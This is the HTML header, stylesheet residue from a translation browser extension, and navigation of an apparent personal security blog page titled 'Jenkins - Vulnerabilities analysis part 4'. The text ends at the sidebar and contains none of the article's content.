<html class="no-touch"><head>
	<meta charset="utf-8">
	<title>Jenkins - Vulnerabilities analysis part 4</title>
	
	<meta name="description" content="Jenkins - Vulnerabilities analysis part 4">
	
	<meta name="author" content="Liodeus">

	<!-- Enable responsive viewport -->
	<meta name="viewport" content="width=device-width, initial-scale=1.0">

	<!-- Le HTML5 shim, for IE6-8 support of HTML elements -->
	<!--[if lt IE 9]>
	<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
	<![endif]-->

	<!-- Le styles -->
	<link href="/assets/resources/bootstrap/css/bootstrap.min.css" rel="stylesheet">
	<link href="/assets/resources/font-awesome/css/font-awesome.min.css" rel="stylesheet">
	<link href="/assets/resources/syntax/syntax.css" rel="stylesheet">
	<link href="/assets/css/style.css" rel="stylesheet">

	<!-- Le fav and touch icons -->
	<!-- Update these with your own images
	<link rel="shortcut icon" href="images/favicon.ico">
	<link rel="apple-touch-icon" href="images/apple-touch-icon.png">
	<link rel="apple-touch-icon" sizes="72x72" href="images/apple-touch-icon-72x72.png">
	<link rel="apple-touch-icon" sizes="114x114" href="images/apple-touch-icon-114x114.png">
	-->

	<link rel="alternate" type="application/rss+xml" title="" href="/feed.xml">
<style type="text/css">.TnITTtw-fp-collapsed-button {
    display: none;
    position: fixed !important;
    top: 16px !important;
    right: 16px !important;
}

.TnITTtw-fp-collapsed-button:hover {
    opacity: 1.0 !important;
}

.TnITTtw-mate-fp-bar {
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Helvetica, Arial, Ubuntu, sans-serif !important;
    color: #000;
    position: fixed;
    top: 16px;
    right: 16px;
    z-index: 999;
    background: rgb(255 255 255 / 0.95);
    backdrop-filter: blur(10px);
    -webkit-backdrop-filter: blur(10px);
    padding: 16px;
    border-radius: 11px;
    box-shadow: 0 2px 10px rgb(0 0 0 / 25%);
    width: 320px;
    line-height: initial;
}

@-moz-document url-prefix() {
    .TnITTtw-mate-fp-bar {
        background: rgb(255 255 255 / 1.0);
    }
}

.TnITTtw-mate-fp-bar.TnITTtw-dark-mode {
    background: rgb(44, 44, 43);
}

.TnITTtw-hide-fp-bar {
    width: 12px;
    height: 12px;
    background-image: url(chrome-extension://ihmgiclibbndffejedjimfjmfoabpcke/res/images/ui/regular-close-tt.png) !important;
    background-size: 12px 12px;
    background-repeat: no-repeat;
    background-position: center;
    position: absolute;
    right: 8px;
    top: 8px;
    cursor: pointer;
}

.TnITTtw-hide-fp-bar:hover {
    background-image: url(chrome-extension://ihmgiclibbndffejedjimfjmfoabpcke/res/images/ui/hover-close-tt.png) !important;
}

.TnITTtw-current-page-lang {
    color: #6d6d72;
    font-size: 14px;
    font-weight: 600;
    margin-bottom: 8px;
    text-align: center;
}

.TnITTtw-dark-mode .TnITTtw-current-page-lang {
    color: #98989D;
}

.TnITTtw-fp-translate {
    width: calc(100% - 73px) !important;
    font-size: 14px !important;
    text-transform: none !important;
}

.TnITTtw-fp-translate.TnITTtw-in-progress {
    animation-name: funky-bg;
    animation-duration: 10s;
    animation-timing-function: ease-in;
}

.TnITTtw-fp-translate.TnITTtw-show-original {
    width: calc(100% - 20px) !important;
}

@keyframes funky-bg {
    from {
        background-image: linear-gradient(145deg, #01EF92, #00D8FB),
        linear-gradient(35deg, rgba(1, 239, 146, 0.25), rgba(0, 216, 251, 0.25)) !important;
    }

    to {
        background-image: linear-gradient(90deg, #01EF92, #00D8FB),
        linear-gradient(35deg, rgba(1, 239, 146, 0.25), rgba(0, 216, 251, 0.25)) !important;
    }
}

.TnITTtw-change-language, .TnITTtw-stop-fp {
    width: 38px;
    height: 38px;
    background-color: #EFEFF4;
    background-repeat: no-repeat;
    background-position: center;
    background-size: 16px 16px;
    border-radius: 11px;
    display: inline-block;
    vertical-align: top;
    cursor: pointer;
}

.TnITTtw-change-language {
    background-image: url(chrome-extension://ihmgiclibbndffejedjimfjmfoabpcke/res/images/ui/globe-earth.png) !important;
}

.TnITTtw-dark-mode .TnITTtw-change-language {
    background-image: url(chrome-extension://ihmgiclibbndffejedjimfjmfoabpcke/res/images/ui/globe-earth-dark.png) !important;
}

.TnITTtw-stop-fp {
    display: none;
    background-image: url(chrome-extension://ihmgiclibbndffejedjimfjmfoabpcke/res/images/ui/regular-stt-stop.png) !important;
    background-size: 12px 12px;
}

.TnITTtw-dark-mode .TnITTtw-change-language, .TnITTtw-dark-mode .TnITTtw-stop-fp {
    background-color: #525251 !important;
}

.TnITTtw-change-language:hover, .TnITTtw-stop-fp:hover {
    background-color: #F6F6F6;
}

.TnITTtw-change-language:active, .TnITTtw-stop-fp:active {
    background-color: #E9E9E9;
}

.TnITTtw-dark-mode .TnITTtw-change-language:hover,
.TnITTtw-dark-mode .TnITTtw-stop-fp:hover,
.TnITTtw-dark-mode .TnITTtw-change-language:active,
.TnITTtw-dark-mode .TnITTtw-stop-fp:active {
    background-color: #767675;
}

#TnITTtw-always-translate {
}

.TnITTtw-fp-options input {
    padding: initial;
    width: auto;
    border: initial;
    box-shadow: initial;
    line-height: initial;
    height: auto;
    display: initial;
    position: initial;
    appearance: auto;
    top: initial;
    cursor: pointer;
    margin: 0;
}

.TnITTtw-fp-options input[readonly="readonly"] {
    opacity: 0.5;
}

#TnITTtw-always-translate + label,
#TnITTtw-never-translate-lang + label,
#TnITTtw-never-translate-site + label {
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Helvetica, Arial, Ubuntu, sans-serif !important;
    display: inline-block;
    font-weight: 400;
    font-size: 14px;
    margin-left: 4px;
    color: #000;
    cursor: pointer;
    text-overflow: ellipsis;
    white-space: nowrap;
    overflow: hidden;
    width: 296px;
    vertical-align: top;
    line-height: initial;
    letter-spacing: initial;
    text-transform: initial;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    padding: 0;
}

#TnITTtw-always-translate + label::before,
#TnITTtw-never-translate-lang + label::before,
#TnITTtw-never-translate-site + label::before,
#TnITTtw-always-translate + label::after,
#TnITTtw-never-translate-lang + label::after,
#TnITTtw-never-translate-site + label::after  {
    content: initial;
} 

.TnITTtw-always-translate-inner-label {
    text-overflow: ellipsis;
    white-space: nowrap;
    overflow: hidden;
    max-width: 252px;
    vertical-align: top;
    display: inline-block;
}

.TnITTtw-dark-mode #TnITTtw-always-translate + label,
.TnITTtw-dark-mode #TnITTtw-never-translate-lang + label,
.TnITTtw-dark-mode #TnITTtw-never-translate-site + label {
    color: #FFF;
}

#TnITTtw-always-translate + label.TnITTtw-not-pro {
    opacity: 0.5;
}

#TnITTtw-always-translate + label .TnITTtw-pro-label {
    position: relative;
    background: #000;
    font-size: 11px;
    text-transform: uppercase;
    color: #FFF;
    padding: 2px 5px;
    border-radius: 4px;
    margin-left: 10px;
    top: -1px;
    user-select: none;
    -webkit-user-select: none;
    display: inline;
    font-weight: 500;
}

.TnITTtw-dark-mode #TnITTtw-always-translate + label .TnITTtw-pro-label {
    background: #FFF;
    color: #000;
}

.TnITTtw-inline-original-tooltip {
    display: none;
    position: absolute;
    margin: 0px;
    border: none;
    padding: 16px;
    color: rgb(0, 0, 0);
    background-color: rgb(255 255 255 / 0.95);
    backdrop-filter: blur(10px);
    border-radius: 11px;
    box-shadow: 0 2px 10px rgb(0 0 0 / 25%);
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Helvetica, Arial, Ubuntu, sans-serif;
    font-style: normal;
    font-variant: normal;
    font-weight: normal;
    font-size: 16px;
    line-height: normal;
}

.TnITTtw-dark-mode.TnITTtw-inline-original-tooltip {
    background-color: rgb(0 0 0 / 0.915);
    color: #FFF;
}

.TnITTtw-inline-original-tooltip .TnITTtw-close-original-tooltip {
    width: 12px;
    height: 12px;
    background-image: url(chrome-extension://ihmgiclibbndffejedjimfjmfoabpcke/res/images/ui/regular-close-tt.png) !important;
    background-size: 12px 12px;
    background-repeat: no-repeat;
    background-position: center;
    position: absolute;
    right: 8px;
    top: 8px;
    cursor: pointer;
}

.TnITTtw-inline-original-tooltip .TnITTtw-close-original-tooltip:hover {
    background-image: url(chrome-extension://ihmgiclibbndffejedjimfjmfoabpcke/res/images/ui/hover-close-tt.png) !important;
}

.TnITTtw-inline-original-tooltip .TnITTtw-original-label {
    margin: 0;
    font-weight: 600;
    font-size: 13px;
    text-transform: uppercase;
    color: #6d6d72;
    margin-bottom: 10px;
}

.TnITTtw-inline-original-tooltip.TnITTtw-dark-mode .TnITTtw-original-label {
    color: #98989D;
}

.TnITTtw-inline-original-tooltip .TnITTtw-text-layout {
    display: inline-block;
    margin: 0;
    font-size: 16px;
    color: #000;
}

.TnITTtw-inline-original-tooltip.TnITTtw-dark-mode .TnITTtw-text-layout {
    color: #FFF;
}

.TnITTtw-highlighted-for-original {
    color: #0F0F5F;
    background-color: #F0F0A0;
}

/* Dropdown scrollbars */

#selVisibleScroll-1, #selVisibleScroll-2, #selVisibleScroll-3 {
    overflow: hidden;
    height: 259px;
    width: 100%;
    position: relative;
}

#sel-scrollbar-1, #sel-scrollbar-2, #sel-scrollbar-3 {
    position: absolute;
    width: 4px;
    height: 259px;
    left: 225px;
}

#sel-track-1, #sel-track-2, #sel-track-3 {
    position: absolute;
    top: 1px;
    width: 4px;
    height: calc(100% - 6px);
}

#sel-dragBar-1, #sel-dragBar-2, #sel-dragBar-3 {
    position: absolute;
    top: 1px;
    width: 4px;
    background: rgba(43, 43, 43, 0.5);
    cursor: pointer;
    border-radius: 4px;
}

.dark-mode #sel-dragBar-1, .dark-mode #sel-dragBar-2, .dark-mode #sel-dragBar-3 {
    background: rgba(255, 255, 255, 0.5);
}

#sel-dragBar-1:hover, #sel-dragBar-2:hover, #sel-dragBar-3:hover, 
#sel-dragBar-1:active, #sel-dragBar-2:active, #sel-dragBar-3:active {
    background: rgba(43, 43, 43, 0.675);
}

.dark-mode #sel-dragBar-1:hover,
.dark-mode #sel-dragBar-2:hover,
.dark-mode #sel-dragBar-3:hover,
.dark-mode #sel-dragBar-1:active,
.dark-mode #sel-dragBar-2:active,
.dark-mode #sel-dragBar-3:active {
    background: rgba(255, 255, 255, 0.675);
}

#sel-scrollbar-1, #sel-track-1, #sel-dragBar-1, 
#sel-scrollbar-2, #sel-track-2, #sel-dragBar-2,
#sel-scrollbar-3, #sel-track-3, #sel-dragBar-3 {
    -webkit-user-select: none;
    user-select: none;
}

/* Spinner for when it's translating a page */

.TnITTtw-cta-button-layout {
    position: relative;
    display: inline;
}

.TnITTtw-spinner {
    display: none;
    text-align: center;
    position: absolute;
    top: 0;
    width: 100%;
    user-select: none;
    -webkit-user-select: none;
}
  
  @media screen and (max-width: 800px) {
    .TnITTtw-spinner {
      top: 28px;
    }
  }

  .TnITTtw-spinner.in-text {
    display: block;
    background: transparent;
    position: initial;
  }

  .TnITTtw-spinner.left {
    text-align: left;
  }
  
  .TnITTtw-spinner > div {
    width: 12px;
    height: 12px;
    background-color: rgb(0, 71, 46);
  
    border-radius: 100%;
    display: inline-block;
    -webkit-animation: sk-bouncedelay 1.4s infinite ease-in-out both;
    animation: sk-bouncedelay 1.4s infinite ease-in-out both;
  }

  .TnITTtw-spinner.in-text > div {
    background-color: #000;
  }
  
  .TnITTtw-spinner .TnITTtw-bounce1 {
    -webkit-animation-delay: -0.32s;
    animation-delay: -0.32s;
  }
  
  .TnITTtw-spinner .TnITTtw-bounce2 {
    -webkit-animation-delay: -0.16s;
    animation-delay: -0.16s;
  }
  
  @-webkit-keyframes sk-bouncedelay {
    0%, 80%, 100% { -webkit-transform: scale(0) }
    40% { -webkit-transform: scale(1.0) }
  }
  
  @keyframes sk-bouncedelay {
    0%, 80%, 100% { 
      -webkit-transform: scale(0);
      transform: scale(0);
    } 40% { 
      -webkit-transform: scale(1.0);
      transform: scale(1.0);
    }
  }</style><style type="text/css">/*
 * contextMenu.js v 1.4.0
 * Author: Sudhanshu Yadav
 * s-yadav.github.com
 * Copyright (c) 2013 Sudhanshu Yadav.
 * Dual licensed under the MIT and GPL licenses
**/

.iw-contextMenu {
    box-shadow: 0px 2px 3px rgba(0, 0, 0, 0.10) !important;
    border: 1px solid #c8c7cc !important;
    border-radius: 11px !important;
    display: none;
    z-index: 1000000132;
    max-width: 300px !important;
    width: auto !important;
}

.dark-mode .iw-contextMenu,
.TnITTtw-dark-mode.iw-contextMenu,
.TnITTtw-dark-mode .iw-contextMenu {
    border-color: #747473 !important;
}

.iw-cm-menu {
    background: #fff !important;
    color: #000 !important;
    margin: 0px !important;
    padding: 0px !important;
    overflow: visible !important;
}

.dark-mode .iw-cm-menu,
.TnITTtw-dark-mode.iw-cm-menu,
.TnITTtw-dark-mode .iw-cm-menu {
    background: #525251 !important;
    color: #FFF !important;
}

.iw-curMenu {
}

.iw-cm-menu li {
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Helvetica, Arial, Ubuntu, sans-serif !important;
    list-style: none !important;
    padding: 10px !important;
    padding-right: 20px !important;
    border-bottom: 1px solid #c8c7cc !important;
    font-weight: 400 !important;
    cursor: pointer !important;
    position: relative !important;
    font-size: 14px !important;
    margin: 0 !important;
    line-height: inherit !important;
    border-radius: 0 !important;
    display: block !important;
}

.dark-mode .iw-cm-menu li, .TnITTtw-dark-mode .iw-cm-menu li {
    border-bottom-color: #747473 !important;
}

.iw-cm-menu li:first-child {
    border-top-left-radius: 11px !important;
    border-top-right-radius: 11px !important;
}

.iw-cm-menu li:last-child {
    border-bottom-left-radius: 11px !important;
    border-bottom-right-radius: 11px !important;
    border-bottom: none !important;
}

.iw-mOverlay {
    position: absolute !important;
    width: 100% !important;
    height: 100% !important;
    top: 0px !important;
    left: 0px !important;
    background: #FFF !important;
    opacity: .5 !important;
}

.iw-contextMenu li.iw-mDisable {
    opacity: 0.3 !important;
    cursor: default !important;
}

.iw-mSelected {
    background-color: #F6F6F6 !important;
}

.dark-mode .iw-mSelected, .TnITTtw-dark-mode .iw-mSelected {
    background-color: #676766 !important;
}

.iw-cm-arrow-right {
    width: 0 !important;
    height: 0 !important;
    border-top: 5px solid transparent !important;
    border-bottom: 5px solid transparent !important;
    border-left: 5px solid #000 !important;
    position: absolute !important;
    right: 5px !important;
    top: 50% !important;
    margin-top: -5px !important;
}

.dark-mode .iw-cm-arrow-right, .TnITTtw-dark-mode .iw-cm-arrow-right {
    border-left-color: #FFF !important;
}

.iw-mSelected > .iw-cm-arrow-right {
}

/*context menu css end */</style><style type="text/css">.ui_selector, .TnITTtw-ui_selector {
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Helvetica, Arial, Ubuntu, sans-serif;
    display: inline-block;
}

.ui_selector .select, .TnITTtw-ui_selector .TnITTtw-select {
    color: #000;
    text-align: center;
    font-weight: 600;
    font-size: 14px;
    border: 1px solid rgba(200, 199, 204, 0.5);
    padding: 10px 15px;
    width: 201px;
    -webkit-user-select: none;
    cursor: pointer;
    border-radius: 11px;
    display: inline-block;
    background-image: -webkit-linear-gradient(top, #FAFAFA, #F6F6F6);
    background-image: -moz-linear-gradient(top, #FAFAFA, #F6F6F6);
    background-size: auto 48px;
    background-position: 0px -11px;
    box-shadow: 0 0.5px 1px rgba(0, 0, 0, 0.10);
    text-overflow: ellipsis;
    overflow: hidden;
    white-space: nowrap;
}

.dark-mode .ui_selector .select, 
.TnITTtw-dark-mode .TnITTtw-ui_selector .TnITTtw-select {
    background-image: -webkit-linear-gradient(top, #4A4A49, #40403F);
    background-image: -moz-linear-gradient(top, #4A4A49, #40403F);
    color: #FFF;
    border-color: #747473;
}

.ui_selector .select:hover,
.TnITTtw-ui_selector .TnITTtw-select:hover {
    color: #424242;
    background-image: -webkit-linear-gradient(top, #FAFAFA, #FAFAFA);
    background-image: -moz-linear-gradient(top, #FAFAFA, #FAFAFA);
}

.ui_selector .select:active,
.TnITTtw-ui_selector .TnITTtw-select:active {
    color: #6d6d72;
    background-image: -webkit-linear-gradient(top, #F6F6F6, #F6F6F6);
    background-image: -moz-linear-gradient(top, #F6F6F6, #F6F6F6);
}

.dark-mode .ui_selector .select:hover,
.dark-mode .ui_selector .select:active,
.TnITTtw-dark-mode .TnITTtw-ui_selector .TnITTtw-select:hover,
.TnITTtw-dark-mode .TnITTtw-ui_selector .TnITTtw-select:active {
    background-image: -webkit-linear-gradient(top, #4A4A49, #4A4A49);
    background-image: -moz-linear-gradient(top, #4A4A49, #4A4A49);
    color: #FFF;
    border-color: #747473;
}

.ui_selector .select .detected-ico,
.TnITTtw-ui_selector .TnITTtw-select .TnITTtw-detected-ico {
    display: inline-block;
}

.ui_selector .active, .ui_selector .active:hover, .ui_selector .active:active,
.TnITTtw-ui_selector .TnITTtw-active, .TnITTtw-ui_selector .TnITTtw-active:hover, .TnITTtw-ui_selector .TnITTtw-active:active {
    box-shadow: 0 -1px 15px -10px rgba(0, 0, 0, 0.85) !important;
    border-bottom-left-radius: 0;
    border-bottom-right-radius: 0;
    background: #F3F3F3;
}

.sliding-text,
.TnITTtw-sliding-text {
    position: relative;
}

.ui_selector .options,
.TnITTtw-ui_selector .TnITTtw-options {
    margin-left: 0px;
    margin-top: -4px;
    background: #fff;
    border: 1px solid rgba(200, 199, 204, 0.5);
    width: 231px;
    overflow: hidden;
    max-height: 313px;
    position: absolute;
    font-size: 12px;
    box-shadow: 0 2px 10px rgb(0 0 0 / 25%);
    border-bottom-left-radius: 6px;
    border-bottom-right-radius: 6px;
    display: none;
}

.ui_selector .options.standalone,
.TnITTtw-ui_selector .TnITTtw-options.TnITTtw-standalone {
    border-radius: 11px;
    margin-top: 16px;
}

/* for now, it can only be on the top */
.ui_selector .options-arrow,
.TnITTtw-ui_selector .TnITTtw-options-arrow {
    display: none;
    position: absolute;
    width: 32px !important;
    height: 18px !important;
    background-image: url(chrome-extension://ihmgiclibbndffejedjimfjmfoabpcke/res/images/ui/tt-dropdown-arrow.png);
    background-size: 32px 18px;
    transform: rotate(180deg);
    margin-top: -1px;
}

.dark-mode .ui_selector .options-arrow,
.TnITTtw-dark-mode .TnITTtw-ui_selector .TnITTtw-options-arrow {
    background-image: url(chrome-extension://ihmgiclibbndffejedjimfjmfoabpcke/res/images/ui/tt-dropdown-arrow-dark.png);
}

.dark-mode .ui_selector .options,
.TnITTtw-dark-mode .TnITTtw-ui_selector .TnITTtw-options {
    background: #525251;
}

.ui_selector .options ul,
.TnITTtw-ui_selector .TnITTtw-options ul {
    list-style: none;
    margin: 0;
    padding: 0;
    width: 232px;
}

.ui_selector .options ul li,
.TnITTtw-ui_selector .TnITTtw-options ul li {
    padding: 10px 0px;
    -webkit-user-select: none;
    text-align: center;
    font-size: 17px;
    -webkit-transition: all 600ms cubic-bezier(0.23, 1, 0.32, 1);
    margin: 0 10px;
    border-radius: 6px;
    position: relative;
}

.dark-mode .options ul li,
.TnITTtw-dark-mode .TnITTtw-options ul li {
    color: #fff;
}

.ui_selector .options ul li:last-child,
.TnITTtw-ui_selector .TnITTtw-options ul li:last-child {
    margin-bottom: 16px;
}

.ui_selector .options ul li.option:first-child,
.ui_selector .options ul li.option_selected:first-child,
.TnITTtw-ui_selector .TnITTtw-options ul li.TnITTtw-option:first-child,
.TnITTtw-ui_selector .TnITTtw-options ul li.TnITTtw-option_selected:first-child {
    margin-top: 16px;
}

.ui_selector .options ul li.whenHover,
.TnITTtw-ui_selector .TnITTtw-options ul li.TnITTtw-whenHover {
    cursor: pointer;
    background: #f3f3f3;
    text-align: center;
}

.dark-mode .ui_selector .options ul li.whenHover,
.TnITTtw-dark-mode .TnITTtw-ui_selector .TnITTtw-options ul li.TnITTtw-whenHover {
    background: rgba(255, 255, 255, 0.5);
}

.ui_selector .options ul li.option_selected,
.TnITTtw-ui_selector .TnITTtw-options ul li.TnITTtw-option_selected {
    cursor: pointer;
    background-image: linear-gradient(145deg, #01EF92, #00D8FB),
    linear-gradient(35deg, rgba(1, 239, 146, 0.25), rgba(0, 216, 251, 0.25)) !important;
    color: #fff;
    font-weight: 600;
}

.ui_selector .options ul .group,
.ui_selector .options ul .group:hover,
.ui_selector .options ul .group.whenHover,
.TnITTtw-ui_selector .TnITTtw-options ul .TnITTtw-group,
.TnITTtw-ui_selector .TnITTtw-options ul .TnITTtw-group:hover,
.TnITTtw-ui_selector .TnITTtw-options ul .TnITTtw-group.whenHover {
    padding: 16px 10px;
    color: #8e8e93;
    font-weight: 600;
    text-transform: uppercase;
    font-size: 12px;
    text-align: center;
    cursor: default;
    background: #FFF;
}

.dark-mode .ui_selector .options ul .group,
.dark-mode .ui_selector .options ul .group:hover,
.dark-mode .ui_selector .options ul .group.whenHover,
.TnITTtw-dark-mode .TnITTtw-ui_selector .TnITTtw-options ul .TnITTtw-group,
.TnITTtw-dark-mode .TnITTtw-ui_selector .TnITTtw-options ul .TnITTtw-group:hover,
.TnITTtw-dark-mode .TnITTtw-ui_selector .TnITTtw-options ul .TnITTtw-group.TnITTtw-whenHover {
    color: #98989D;
    background: #525251;
}

.group-element,
.TnITTtw-group-element {
    width: 153px;
}

.options .dd-search,
.TnITTtw-options .TnITTtw-dd-search {
    border-bottom: 1px solid rgba(200, 199, 204, 0.5);
}

.dark-mode .options .dd-search,
.TnITTtw-dark-mode .TnITTtw-options .TnITTtw-dd-search {
    border-bottom-color: #747473;
}

.dd-search .dd-input,
.TnITTtw-dd-search .TnITTtw-dd-input {
    padding: 16px;
    padding-left: calc(16px * 3);
    width: 168px;
    border: none;
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Helvetica, Arial, Ubuntu, sans-serif;
    text-align: left;
    color: #000;
    font-size: 17px;
    background-image: url(chrome-extension://ihmgiclibbndffejedjimfjmfoabpcke/res/images/ui/searchfield-icon.png);
    background-position: 16px;
    background-size: 16px;
    background-repeat: no-repeat;
    margin: 0;
    height: auto;
}

.dark-mode .dd-search .dd-input,
.TnITTtw-dark-mode .TnITTtw-dd-search .TnITTtw-dd-input {
    color: #FFF;
    background-color: #525251;
}

.dd-search .dd-input:focus,
.TnITTtw-dd-search .TnITTtw-dd-input:focus {
    -webkit-transition: all 275ms cubic-bezier(0.23, 1, 0.32, 1);
    outline: none;
    text-align: left;
}

.dd-input::-webkit-input-placeholder,
.TnITTtw-dd-input::-webkit-input-placeholder {
    color: #8e8e93;
}

.search-failed-plaque,
.TnITTtw-search-failed-plaque {
    text-align: center;
    padding: 20px;
    color: #8e8e93;
    font-size: 17px;
    font-weight: 600;
}

.dark-mode .search-failed-plaque,
.TnITTtw-dark-mode .TnITTtw-search-failed-plaque {
    color: #98989D;
}

.rm-recent,
.TnITTtw-rm-recent {
    position: absolute;
    width: 10px;
    height: 10px;
    background-image: url(chrome-extension://ihmgiclibbndffejedjimfjmfoabpcke/res/images/ui/regular-lang-remove.png);
    background-size: 10px 10px;
    top: 15px;
    right: 10px;
}

.rm-recent:hover,
.TnITTtw-rm-recent:hover {
    background-image: url(chrome-extension://ihmgiclibbndffejedjimfjmfoabpcke/res/images/ui/hover-lang-remove.png);
}

.rm-recent:active,
.TnITTtw-rm-recent:active {
    background-image: url(chrome-extension://ihmgiclibbndffejedjimfjmfoabpcke/res/images/ui/down-lang-remove.png);
}

.option_selected .rm-recent,
.TnITTtw-option_selected .TnITTtw-rm-recent {
    background-image: url(chrome-extension://ihmgiclibbndffejedjimfjmfoabpcke/res/images/ui/down-active-lang-remove.png);
}

.option_selected .rm-recent:hover,
.TnITTtw-option_selected .TnITTtw-rm-recent:hover {
    background-image: url(chrome-extension://ihmgiclibbndffejedjimfjmfoabpcke/res/images/ui/hover-active-lang-remove.png);
}

.option_selected .rm-recent:active,
.TnITTtw-option_selected .TnITTtw-rm-recent:active {
    background-image: url(chrome-extension://ihmgiclibbndffejedjimfjmfoabpcke/res/images/ui/down-active-lang-remove.png);
}

.TnITTtw-hidden {
    display: none;
}</style><style type="text/css">@-webkit-keyframes load4 {
    0%,
    100% {
        box-shadow: 0 -3em 0 0.2em, 2em -2em 0 0em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 0;
    }
    12.5% {
        box-shadow: 0 -3em 0 0, 2em -2em 0 0.2em, 3em 0 0 0, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 -1em;
    }
    25% {
        box-shadow: 0 -3em 0 -0.5em, 2em -2em 0 0, 3em 0 0 0.2em, 2em 2em 0 0, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 -1em;
    }
    37.5% {
        box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0em 0 0, 2em 2em 0 0.2em, 0 3em 0 0em, -2em 2em 0 -1em, -3em 0em 0 -1em, -2em -2em 0 -1em;
    }
    50% {
        box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 0em, 0 3em 0 0.2em, -2em 2em 0 0, -3em 0em 0 -1em, -2em -2em 0 -1em;
    }
    62.5% {
        box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 0, -2em 2em 0 0.2em, -3em 0 0 0, -2em -2em 0 -1em;
    }
    75% {
        box-shadow: 0em -3em 0 -1em, 2em -2em 0 -1em, 3em 0em 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 0, -3em 0em 0 0.2em, -2em -2em 0 0;
    }
    87.5% {
        box-shadow: 0em -3em 0 0, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 0, -3em 0em 0 0, -2em -2em 0 0.2em;
    }
}

@keyframes load4 {
    0%,
    100% {
        box-shadow: 0 -3em 0 0.2em, 2em -2em 0 0em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 0;
    }
    12.5% {
        box-shadow: 0 -3em 0 0, 2em -2em 0 0.2em, 3em 0 0 0, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 -1em;
    }
    25% {
        box-shadow: 0 -3em 0 -0.5em, 2em -2em 0 0, 3em 0 0 0.2em, 2em 2em 0 0, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 -1em;
    }
    37.5% {
        box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0em 0 0, 2em 2em 0 0.2em, 0 3em 0 0em, -2em 2em 0 -1em, -3em 0em 0 -1em, -2em -2em 0 -1em;
    }
    50% {
        box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 0em, 0 3em 0 0.2em, -2em 2em 0 0, -3em 0em 0 -1em, -2em -2em 0 -1em;
    }
    62.5% {
        box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 0, -2em 2em 0 0.2em, -3em 0 0 0, -2em -2em 0 -1em;
    }
    75% {
        box-shadow: 0em -3em 0 -1em, 2em -2em 0 -1em, 3em 0em 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 0, -3em 0em 0 0.2em, -2em -2em 0 0;
    }
    87.5% {
        box-shadow: 0em -3em 0 0, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 0, -3em 0em 0 0, -2em -2em 0 0.2em;
    }
}</style><style type="text/css">/* This is not a zero-length file! */</style></head>

<body style="">
	<nav class="navbar navbar-default visible-xs" role="navigation">
		<!-- Brand and toggle get grouped for better mobile display -->
		<div class="navbar-header">
			<button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
				<span class="sr-only">Toggle navigation</span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
			</button>
			
			<a type="button" class="navbar-toggle nav-link" href="http://github.com/Liodeus">
				<i class="fa fa-github"></i>
			</a>
			
			
			
			<a type="button" class="navbar-toggle nav-link" href="mailto:thibaultgalbourdin@gmail.com">
				<i class="fa fa-envelope"></i>
			</a>
			
			<a class="navbar-brand" href="/">
				<img src="//www.gravatar.com/avatar/94b2c0c075c4ed839beee2dafbb2ac69?s=35" class="img-circle">
				Liodeus
			</a>
		</div>

		<!-- Collect the nav links, forms, and other content for toggling -->
		<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
			<ul class="nav navbar-nav">
				<li class="active"><a href="/">Home</a></li>
				<!-- <li><a href="/">Categories</a></li> -->
				<li><a href="/tags.html">Tags</a></li>
			</ul>
		</div><!-- /.navbar-collapse -->
	</nav>

	<!-- nav-menu-dropdown -->
	<div class="btn-group hidden-xs" id="nav-menu">
		<button type="button" class="btn btn-default dropdown-toggle" data-toggle="dropdown">
			<i class="fa fa-bars"></i>
		</button>
		<ul class="dropdown-menu" role="menu">
			<li><a href="/"><i class="fa fa-home"></i>Home</a></li>
			<!-- <li><a href="/"><i class="fa fa-folder"></i>Categories</a></li> -->
			<li><a href="/tags.html"><i class="fa fa-tags"></i>Tags</a></li>
			<li class="divider"></li>
			<li><a href="#"><i class="fa fa-arrow-up"></i>Top of Page</a></li>
		</ul>
	</div>

	<div class="col-sm-3 sidebar hidden-xs" style=" min-height: 3332px;">
		<!-- sidebar.html -->
<header class="sidebar-header" role="banner">
	<a href="/">
		<img src="https://liodeus.github.io/assets/imgs/profile.png.ico" class="img-circle">
	</a>
	<h3 class="title">
        <a href="/">Liodeus</a>
    </h3>
</header>


<div id="bio" class="text-center">
	OSCP journey with Liodeus !
</div>


